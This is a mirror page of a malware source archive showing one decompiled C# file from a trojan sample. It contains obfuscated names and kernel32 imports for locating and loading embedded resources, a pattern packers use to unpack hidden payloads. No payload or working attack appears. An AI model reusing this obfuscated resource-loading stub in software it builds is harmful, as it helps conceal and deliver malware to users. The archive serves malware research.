mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2026-06-22 02:39:25 +00:00
27 lines
1.2 KiB
C#
27 lines
1.2 KiB
C#
// Decompiled with JetBrains decompiler
|
|
// Type: Uckd53gyd1mktkszq.W4ytuf0iqrlf3g3zj
|
|
// Assembly: k5xkdoui, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|
// MVID: 4CD3E51E-5608-4BA4-B66B-04206D6A26CE
|
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan.MSIL.Pakes.cs-37cd70e587eb1be5e97c2131880d030c32b02d02e1db6caf24f5eca693e9b335.exe
|
|
|
|
using System;
|
|
using System.Runtime.InteropServices;
|
|
|
|
namespace Uckd53gyd1mktkszq
|
|
{
|
|
public class W4ytuf0iqrlf3g3zj
|
|
{
|
|
[DllImport("kernel32", EntryPoint = "GetModuleHandleA", CharSet = CharSet.Ansi, SetLastError = true)]
|
|
public static extern IntPtr U4ahdus33bqrr3xyza2g5z4kafxio11rc(string lpModuleName);
|
|
|
|
[DllImport("kernel32.dll", EntryPoint = "FindResourceA")]
|
|
public static extern IntPtr Kfmfyffydmg552qml(IntPtr hModule, int lpID, string lpType);
|
|
|
|
[DllImport("kernel32.dll", EntryPoint = "LoadResource", SetLastError = true)]
|
|
public static extern IntPtr Mcl3unsafxasl1ryb(IntPtr hModule, IntPtr hResInfo);
|
|
|
|
[DllImport("kernel32.dll", EntryPoint = "SizeofResource", SetLastError = true)]
|
|
public static extern uint Ztwvqitdih0ihxfum(IntPtr hModule, IntPtr hResInfo);
|
|
}
|
|
}
|